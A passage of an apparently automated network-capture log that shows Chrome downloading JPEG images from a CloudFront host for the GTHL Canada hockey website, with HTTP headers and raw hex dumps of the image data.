                                                                                                                          2025-01-13 21:01:20 UTC11352INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          113192.168.11.204993754.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC441OUTGET /app/uploads/gthl/2024/12/16114804/Screenshot-2024-12-16-at-11.47.53-AM-730x408.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 67853
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Mon, 16 Dec 2024 16:48:05 GMT
                                                                                                                          ETag: "5ddde54fdf9cc70b26a79ca314abb274"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 07b0e28d0c589c8a26610bbc5dcd660a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: yqj_FDDFEoTGpyHVKDVXP3oIjfCZELs1ptW7F5Fq34e500AMqCFP7A==
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 0d 1c 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0d 0c 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 0b 00 1a 00 0c 00 1c 00 0c 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 01 e6 63 70 72 74 00 00 03 9c 00 00 00 23 77 74 70 74 00 00 03 c0 00 00 00 14 72 58 59 5a 00 00 03 d4 00 00 00 14 67 58 59 5a 00 00 03 e8 00 00 00 14 62 58 59 5a 00 00 03 fc 00 00 00 14 72
                                                                                                                          Data Ascii: JFIFICC_PROFILEapplmntrRGB XYZ acspAPPLAPPL-appldescPbdscmcprt#wtptrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:20 UTC627INData Raw: c7 c2 ae bb b0 63 7d d9 b0 98 ee 1d a5 3a f9 b0 cf 6e de 64 91 a1 ec 0e 3f 30 fa 8a f4 de 04 69 fc 35 f0 bb c2 a9 f8 f9 c6 5b db 7b 3d 43 50 8b 3a 7d bc a3 f5 c2 32 3e 54 44 3d 79 d8 fd 2a 07 86 2d db a8 78 60 f0 75 7d c5 be 2e ea 1a 96 b1 6f 7a fe 66 95 a3 dc 49 ce 79 58 01 1c 68 08 3f 98 e4 f6 c6 2b 40 78 d5 be 78 fb e2 db 7f 49 b9 1b 67 6b d3 58 bb 72 e9 9a 5d bd a4 9e 45 9c 59 f9 54 74 0a 4f d6 bc fa 36 cb 56 eb f3 21 da 6b fc 73 af dc f6 c8 db af 4f ef 57 ac c7 b4 ff 00 95 cf c4 cf 8b fe 2d f8 a2 dd 6f a6 43 a9 5f db 6d 89 af 99 34 ad 1a dc 95 62 0b 72 a0 90 0e ae c7 23 e9 5b c9 b0 f5 9d 9d f0 f7 f0 67 6f 26 b3 e5 c1 bf f7 3d ab dc a5 a1 23 f1 0f 77 22 fc a0 8e fc a9 9c f5 ad 6a f0 9b e0 cb c4 7e d6 e2 6e 8d c4 5d 73 83 2d 71 6d a7 33 4b 14 1a a5 c0
                                                                                                                          Data Ascii: c}:nd?0i5[{=CP:}2>TD=y*-x`u}.ozfIyXh?+@xxIgkXr]EYTtO6V!ksOW-oC_m4br#[go&=#w"j~n]s-qm3K
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 66 2a d7 44 db 9e 76 61 fa f1 ec 31 d3 bf f7 55 b2 eb 58 b2 8c 3a 2c b9 b9 4e 85 fd be 95 0b 55 bd bd 89 44 16 83 9e 49 46 4b 67 1c 83 fb ea d7 35 be 21 f3 31 97 55 cb b7 a9 35 60 75 99 ae ad da e1 5f ca 7c 92 c0 f7 35 6c 93 f1 13 9f e9 7b ff 00 57 af f1 aa 9b 2b c9 c9 b8 45 3e 56 30 70 7a ff 00 0a 24 66 de d1 52 0b 66 21 24 ea c5 bb 93 44 75 05 6a b8 72 cc bc 8a 87 e6 6f 7f b5 48 ba c4 ce 23 c6 71 86 0d eb 8f ad 56 e6 32 c9 e5 c0 a5 99 4f 31 03 f6 aa 86 19 96 20 bc b8 33 37 5f 70 28 9c 86 f7 2d 1c e6 45 c1 e9 8e b5 31 e3 03 0a a4 91 8e 99 39 a1 5d 69 f1 c0 eb 86 27 9f b5 49 8b f5 78 66 ef 17 7f 51 43 28 ad 0c ad 22 98 d0 37 27 cc 47 ae 2a 91 5b b2 03 2e 63 c3 76 0c 7a 8a a3 df fc fe 7a 48 5d fa 8c 85 e5 03 f7 54 79 21 fc 46 39 89 04 b7 61 eb 41 3b 92 43
                                                                                                                          Data Ascii: f*Dva1UX:,NUDIFKg5!1U5`u_|5l{W+E>V0pz$fRf!$DujroH#qV2O1 37_p(-E19]i'IxfQC("7'G*[.cvzzH]Ty!F9aA;C
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: f3 82 9a 94 77 7c 6c d8 96 f6 ea 52 28 f5 db 5c 0f fd 60 a0 ef b7 8b 65 1f ee 68 e2 3e 3b 7e 81 b8 fe ea e4 07 c2 a9 89 f1 81 a1 b0 f5 d3 af bf d5 9a eb ef 8a f1 9f 0c 9c 45 04 f7 d0 6e 3f b0 57 21 3e 15 51 f2 78 bd d0 7a ff 00 f3 0b e1 ff 00 66 68 37 db e2 f2 d8 f0 c9 07 5e a7 58 83 1f c4 57 19 36 e0 55 dc ba 4f 98 79 48 bf b7 e5 c7 af eb 17 bd 76 77 e2 eb 6b 73 73 e1 a6 d8 5a db cb 33 2e b3 0b 15 8d 4b 1f 4f 6a e4 37 0a 38 69 bf 78 83 c4 3d bf a2 6d dd af a8 5d 4b 75 a9 5b a9 64 b7 72 b1 0f 30 12 58 e3 00 00 09 a0 fa 19 d5 5c 7f 88 9b 96 e6 ff 00 e8 99 39 ff 00 fc 4a f9 be bd 58 e4 b9 b8 90 b9 2c 6e 25 ce 7f e5 1a fa 31 e2 8e ab 6b c3 df 0f da ed ce bd 2a 47 1e 95 b6 5a de 67 ce 14 b0 83 93 03 f7 d7 ce 3d cc eb 34 b2 32 02 39 a5 77 1f 62 c4 d0 3a dd 08
                                                                                                                          Data Ascii: w|lR(\`eh>;~En?W!>Qxzfh7^XW6UOyHvwkssZ3.KOj78ix=m]Ku[dr0X\9JX,n%1k*GZg=429wb:
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 93 20 b8 bb 42 55 51 40 23 26 9c 6e 59 98 23 fa f4 a1 2c e1 23 01 fa 1f 7f 71 ed 55 49 40 3c cf 10 3e d4 4e 45 9e 3b 74 65 44 45 e6 3d cd 49 b4 e5 89 99 14 2b 64 67 e9 56 b9 b9 e4 63 f3 e0 7a 0a 91 0a 24 70 1b 66 7e 79 64 1d 0f b5 11 29 91 1f 35 c3 4c 52 21 9c ab 1e c7 ef 4c 9a 46 32 9f 2d c3 28 f5 5e df b8 54 14 92 4b 99 11 6e 4b 17 84 72 8e bd c5 1a 26 31 b9 ed 8f e6 28 24 2c f3 47 f2 2c 5e 6b 3f 54 27 f6 7d f3 52 34 f9 ff 00 14 ec b7 5f 28 1d f3 43 5b 98 c0 c8 5c 12 3b fb d0 03 b3 05 52 47 cb d5 7d 30 68 25 5c 93 1c cc 62 6c 2b 1e 5e 9e f4 bf 15 34 60 46 f1 a9 07 a0 c1 eb 91 41 fc 4c 68 39 a6 04 8e 5c 60 77 e6 f7 a0 13 14 cb f3 39 04 f6 f7 a0 92 a8 6e 9b 08 01 39 eb cc 7a 0a 7d a9 8d 26 66 41 8e 40 79 fa 77 fa 0a 8c c2 e2 44 58 ec be 58 d7 ab 91 de 98
                                                                                                                          Data Ascii: BUQ@#&nY#,#qUI@<>NE;teDE=I+dgVcz$pf~yd)5LR!LF2-(^TKnKr&1($,G,^k?T'}R4_(C[\;RG}0h%\bl+^4`FALh9\`w9n9z}&fA@ywDXX
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 61 28 9a c3 47 a8 2f 4e 8c 5c 75 fe ca dc bf 04 21 db e1 c7 bc cc ab d0 ae aa 7f ec 92 bc 77 e3 15 b5 a3 d3 b8 a3 b4 b7 7c 68 09 d6 74 f6 b7 2c 07 62 87 a1 fe 75 ec 9e 08 ce 3e 1c 7b c6 3c e4 f2 6a 83 ef fa b5 a0 e5 9f 0e 02 a7 10 f6 aa 8e cd ab 59 91 ff 00 b4 15 d2 7f 8c d8 ff 00 79 78 63 ff 00 e7 25 ff 00 40 57 37 38 6a 89 36 ff 00 da 6d cc 01 5d 56 d4 7f da 0a e9 47 c6 5e d6 49 b4 2e 1a 3a 0c ac 77 92 96 3e c3 90 50 5e 3c 70 c4 64 f8 75 6c 4c 7e cc 3a 61 3f c1 6b 0d f8 3a 15 5d 7f 7f 28 93 b5 a5 b7 cb 8f f9 55 e9 7e 2a f6 d6 bb be 7e 1d fb 32 3d 9d a5 dc 6b 52 41 67 a7 4c d1 d9 af 98 c5 00 5c 9c 0f 6a c4 3e 12 fc 39 de db 4a f7 7d 6b bb 93 6e 6a 1a 6e 9d 71 05 bc 71 4f 75 09 88 3b a8 62 c0 73 75 c0 cd 06 37 e0 bc 1f fb a0 5b b9 98 9f 99 b5 46 19 f6 f3
                                                                                                                          Data Ascii: a(G/N\u!w|ht,bu>{<jYyxc%@W78j6m]VG^I.:w>P^<pdulL~:a?k:](U~*~2=kRAgL\j>9J}knjnqqOu;bsu7[F
                                                                                                                          2025-01-13 21:01:20 UTC666INData Raw: 60 52 c8 a5 4d 29 9a 07 73 0a 72 37 5e f4 3e 4a 72 0c 1a 09 51 bf d6 93 02 5b 22 a9 1f 2f 2f 53 4f c8 1d a8 28 01 1e b4 8c 61 8f cd 54 32 0c f6 aa 73 8f 6a 0a 3c 2b cb 90 28 26 30 3b 54 a0 72 29 8e a0 82 68 02 08 ec 29 53 4f 4a 5c c6 82 ad da 80 40 cd 11 d8 d0 8b 1c d0 52 95 2a 63 39 07 14 0f a6 bf 6a 6f 39 fa 52 2c 4f 7a 06 d2 a5 4a 81 52 a5 4a 81 52 a5 4a 81 52 a5 4a 81 52 a5 4a 81 52 a5 4a 81 52 a5 4a 83 68 1d b9 32 47 7a 97 63 6f 23 2f 9e 14 00 7b 86 f7 a5 4a b8 f7 eb 3b 34 c5 55 c6 57 04 3c b1 f9 47 ae 0e 54 d2 6e 63 d6 95 2a ab d1 c1 24 d2 26 30 dd 2a 6c 37 39 c7 30 a5 4a ab 57 66 5b 53 30 97 1c dc aa 59 86 00 ed f5 a6 bd cb c9 19 54 5c e7 f9 52 a5 58 21 bd d7 3d 83 40 86 2e 72 fc ce 3a 55 b3 54 98 ff 00 44 a6 95 2a c9 43 57 51 54 f4 a0 c3 e5 af 56
                                                                                                                          Data Ascii: `RM)sr7^>JrQ["//SO(aT2sj<+(&0;Tr)h)SOJ\@R*c9jo9R,OzJRJRJRJRJRJRJh2Gzco#/{J;4UW<GTnc*$&0*l790JWf[S0YT\RX!=@.r:UTD*CWQTV


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          114192.168.11.204994054.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC673OUTGET /app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2025-2-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 65724
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Thu, 02 Jan 2025 15:56:22 GMT
                                                                                                                          ETag: "d47bf6f189b1305801e65b70197eaf75"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 16f689172b396b7e266a396b6b5d6754.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: j8XTczP5G_62wuPPCDs5DxsBSxXqKoB5Ldw9HcAUvScQt5gEVB4qXw==
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 00 08 09 0a ff c4 00 68 10 00 01 02 04 04 03 05 04 07 03 06 09 05 0a 09 0d 01 02 03 00 04 05 11 06 12 21 31 07 41 51 08 13 22 61 71 14 32 81 91 09 15
                                                                                                                          Data Ascii: JFIF&&CC"h!1AQ"aq2
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: bf 51 9c 7d 00 38 4d d4 a5 15 0b 0f 4b db 48 b7 53 ce c3 49 1f 40 08 29 39 0f 38 a3 71 52 95 f5 de 0b a9 ca a1 17 75 84 7b 43 7d 73 36 6e 7f 2b 8f 8c 5c 29 8a 98 76 99 2c 27 5c 4a e6 43 48 ef 4a 45 86 7b 0b fe 70 da a2 c2 5c 77 b9 71 20 a1 d4 90 a0 76 20 e8 62 ec e3 71 1e 35 b8 e9 1c 14 01 17 10 ea b1 26 69 f5 69 d9 10 9b 09 69 87 19 fe ea 88 fd d0 cc e9 1d 04 f2 8a 8d cb 80 3a d3 ea 6a b0 17 75 3f a4 6b 00 f8 a3 27 e0 01 02 97 51 04 7f 8e 4f e9 1a b8 b6 63 68 e6 d6 f5 d9 64 78 31 ee d0 6b 22 8e a0 2f ee a4 df e3 1e 6a 71 e7 16 9c aa 51 d2 3d 2b da 12 df 53 2c 5f ee a7 f5 8f 36 36 1b 5f 84 a8 03 e7 b4 46 28 39 2d 78 58 9f 64 40 3d 62 d2 83 e5 15 bc 30 d9 ee 02 12 92 48 3c b5 8b 32 58 7c 22 fd cb 96 1c f2 98 e4 56 c2 9b 3d ad 94 5b a1 0c 2e e3 89 d3 48 2a
                                                                                                                          Data Ascii: Q}8MKHSI@)98qRu{C}s6n+\)v,'\JCHJE{p\wq v bq5&iii:ju?k'QOchdx1k"/jqQ=+S,_66_F(9-xXd@=b0H<2X|"V=[.H*
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 75 4a 1d e3 85 4a ca 0b 5a d8 1b 01 7e 42 33 df a4 9f 8a 18 79 cc 7b 41 e0 be 09 9b 61 fc 39 c3 4a 2b 14 89 74 b0 b0 b6 d5 32 a4 24 b8 6e 34 24 25 2d a4 f9 85 46 e8 aa 9a dc a7 1e 76 4b fc f0 47 9f a9 52 dd 50 85 2a 15 37 8a 6e 72 5b fe 3d ee 4f 61 d2 3b 11 f6 56 6f 7e df 98 2e ff 00 fe e8 d7 ff 00 e4 42 18 8f e8 ff 00 c0 d3 bc 38 c5 d8 db 82 1d a6 e8 3c 48 a9 61 09 0f ac a6 a9 14 d9 24 f7 8a 64 5c ab c4 97 54 41 ca 95 91 a6 a5 36 8f 16 d1 a9 73 55 c9 f4 ca cb 8f 12 8d d4 af c2 3a c7 b5 3b 08 e3 5c 3b c0 ee 36 d2 e5 6b 93 12 ec 50 f1 6c ba a8 15 57 a6 08 4a 14 1e fe 8c ad 44 db 28 70 27 c8 05 18 e9 46 de 9c 77 c6 e7 93 ad d5 2e aa fa 3d a3 c7 cb f0 c1 1f f4 71 f1 46 a5 83 b8 ec 9e 1a 62 a6 01 c2 d8 d6 41 da 15 52 5d fb 21 29 53 c0 f7 2a 20 ef 75 5d 1e 8e
                                                                                                                          Data Ascii: uJJZ~B3y{Aa9J+t2$n4$%-FvKGRP*7nr[=Oa;Vo~.B8<Ha$d\TA6sU:;\;6kPlWJD(p'Fw.=qFbAR]!)S* u]
                                                                                                                          2025-01-13 21:01:20 UTC13405INData Raw: bf e5 78 f1 7d 4d af b5 2a 23 53 12 40 c8 c5 12 76 82 28 11 07 22 d0 04 83 ac 31 09 e8 39 42 6a 85 8a 41 e7 09 ad b3 bc 03 10 5d f9 40 27 d2 15 2d a9 44 08 50 4b 11 ce 01 08 84 de 0a 50 53 e2 02 1d 89 72 76 30 52 da 92 6c a1 00 64 66 a2 55 a4 1d 87 1d 96 79 0f b4 b2 87 1b 50 52 54 9d c1 10 72 dd 8c 15 64 03 68 06 5c 6a fc 51 c4 55 9c 34 30 cc d7 72 58 2b 0b 71 cc b7 5a c8 db 7d be 11 3d c1 1e 27 ab 87 98 8c 3f 35 de ae 9d 36 03 53 4d a0 ed d1 60 79 46 60 9d 74 10 e1 9f 0a 85 a0 5b 0b 3e 27 d1 da 6d 4e 4a b1 22 cd 4a 9b 30 87 e5 df 40 5b 6b 42 ae 08 30 e6 fe 51 e6 6e cc bc 45 53 13 2e 60 ca 94 cd 9a 7c e7 95 2a 3b 2f 9a 7e 31 e9 91 6b 6d 09 ac 0c 18 e8 e8 e8 88 1d 1d 1d 00 74 86 01 85 a0 d0 48 35 ed bc 00 71 8e bd e3 a0 61 01 d1 d1 de b1 d0 01 d0 3e 70 16
                                                                                                                          Data Ascii: x}M*#S@v("19BjA]@'-DPKPSrv0RldfUyPRTrdh\jQU40rX+qZ}='?56SM`yF`t[>'mNJ"J0@[kB0QnES.`|*;/~1kmtH5qa>p
                                                                                                                          2025-01-13 21:01:20 UTC3167INData Raw: 69 72 7d 20 1b 95 ef 02 d6 b2 7b a6 47 78 bf 9f eb 17 5a de 54 95 48 c3 19 cf cc af a8 f4 1b 78 53 95 58 bd 38 f9 1b 9d 46 b7 86 66 aa a8 99 4d 5a 4e f2 aa 5a 42 c8 b9 b8 47 86 ea 02 c7 53 7d 0c 55 e4 d5 87 ea 15 99 16 9e 68 3e f4 f4 c6 42 a7 15 98 a8 29 60 65 49 be b7 23 7b 0d e2 8c eb 74 54 d3 98 92 92 69 c9 89 d9 87 03 8f bc 5d 29 61 82 a3 a2 07 23 6b ea a8 d1 f8 41 85 e9 4b e2 1c bd 23 d9 7d a1 74 f2 89 ff 00 6a 52 f3 94 ad b0 6e 81 6d 00 25 48 d3 5f 58 f4 33 a7 5a 92 7b e3 1f 3f c8 f1 e9 db b5 de df c3 1f 99 e9 5a 55 1e 42 89 20 d4 8d 2a 4d a9 56 1a 1a 36 d2 42 45 ce e7 d4 c2 d2 d3 08 c8 94 13 e2 37 85 c9 19 4d cc 36 94 41 28 4a 85 ad 73 fa c7 2d e5 bc 90 33 7e 2a 61 0c 23 8b 27 d3 2d 52 a4 b0 e4 db 2d 85 ad f6 bc 0f 58 9d 01 50 d4 e8 39 de 31 da df
                                                                                                                          Data Ascii: ir} {GxZTHxSX8FfMZNZBGS}Uh>B)`eI#{tTi])a#kAK#}tjRnm%H_X3Z{?ZUB *MV6BE7M6A(Js-3~*a#'-R-XP91


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          115192.168.11.204994154.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC445OUTGET /app/uploads/gthl/2024/09/18145918/Game-Day-Meals-for-the-Season-1600x900-2-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 58245
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Wed, 18 Sep 2024 16:18:16 GMT
                                                                                                                          ETag: "e1e5e3ba30b15eff39c28d582ff542f0"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 e67eec39bafe7d4b59266632bc2a9886.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: kdLAKxBMjlwdzi6ozPzU3EZqWKoHEE89CHvOB67IzrthV9JTYoEugw==
                                                                                                                          2025-01-13 21:01:20 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 00 03 07 08 09 06 04 05 ff c4 00 68 10 00 01 02 05 02 03 04 05 03 0b 0d 0a 0a 08 07 01 01 02 03 00 04 05 06 11 07 12 08 21 31 13 41 51 61 09 14 22 71 81 15 32 91 23
                                                                                                                          Data Ascii: JFIF&&CC"h!1AQa"q2#
                                                                                                                          2025-01-13 21:01:20 UTC8819INData Raw: fa 4d b2 d2 81 52 d6 14 14 37 a7 24 a4 15 25 25 45 47 72 b6 80 00 11 b1 dc 43 d1 6a b7 0e 86 5f 54 3a 15 3d f9 fa 84 f5 0e 65 89 69 66 10 54 e3 ce 14 f2 4a 52 3a 93 e1 1f 85 a3 3a e6 e6 a8 56 ab 34 79 a5 52 65 d6 fb 1f 2b db de ad 30 1d 5b b4 c5 2d 4d a5 4f a4 28 ed 74 29 29 52 93 cb d9 75 1e 71 4c 96 ba cd c8 cf 59 b2 17 67 c9 f2 73 35 4a c4 e5 ad 5b 96 48 50 5c bd 49 a0 0b 4e a3 27 93 2b f6 7a f7 3e d7 3f 15 31 12 6a 2c c3 49 68 1d 1d ac d1 b0 1f 7b ce da 9e 68 c3 64 26 c3 36 24 e6 dc 9d f9 2f 9b 82 eb 56 e3 b3 38 73 b6 2d db b2 89 39 49 aa 4b 2e 6c bd 29 36 d1 6d d6 f7 4c 38 a4 e5 27 98 c8 20 fc 63 1f 71 2d a7 b7 c5 cb c5 3e 8a dd 36 fd a9 53 a8 52 28 af a1 55 19 d9 79 75 2d 99 51 eb 21 59 71 43 92 79 73 e7 19 b2 43 55 9a 6a d9 bc f5 1e bc a9 79 7b 52
                                                                                                                          Data Ascii: MR7$%%EGrCj_T:=eifTJR::V4yRe+0[-MO(t))RuqLYgs5J[HP\IN'+z>?1j,Ih{hd&6$/V8s-9IK.l)6mL8' cq->6SR(Uyu-Q!YqCysCUjy{R
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: cb cd 28 29 0e 20 8c 85 02 3a 83 14 d5 1a 54 dd 29 e1 93 2d b5 f6 23 50 7b 0f e8 ab 09 49 e8 13 cd cd 04 f7 71 09 48 ee 84 50 8b 94 31 ce 2b 50 8f 0a f4 10 a8 5a 71 ce 2a 50 8f a1 43 ba 2a 50 ee 89 1a 54 64 2a 14 22 a5 08 bd 42 2b 50 89 81 51 10 a9 50 8a 94 33 17 91 83 15 a8 43 c1 4c 21 50 47 74 24 5a a1 09 81 e1 12 02 a3 21 64 70 3c 61 c2 62 01 88 31 92 57 00 29 12 09 eb ca 0e d8 48 a0 06 61 b0 22 41 03 c6 0a 72 80 66 0c 18 20 66 12 70 0b 0c 71 89 fb dc 2f 2f f4 0c 7f 4e dc 73 33 4d 2c 0a b6 a9 5e f4 bb 0e 87 33 2b 2f 3d 56 71 6d b2 e4 ca 94 1a 49 4a 14 b3 b8 a4 13 d1 27 ba 3a 69 c6 28 ff 00 d5 c2 f2 ff 00 40 c7 f4 ed c7 35 f4 77 51 3f 5a 8d 48 a2 ea 01 a5 fc a3 f2 43 ab 73 d5 7b 5e cf b4 dc da 91 8d d8 38 f9 d9 e9 dd 1d 63 04 18 c2 8d 1c cb fd fc ce cb
                                                                                                                          Data Ascii: () :T)-#P{IqHP1+PZq*PC*PTd*"B+PQP3CL!PGt$Z!dp<ab1W)Ha"Arf fpq//Ns3M,^3+/=VqmIJ':i(@5wQ?ZHCs{^8c
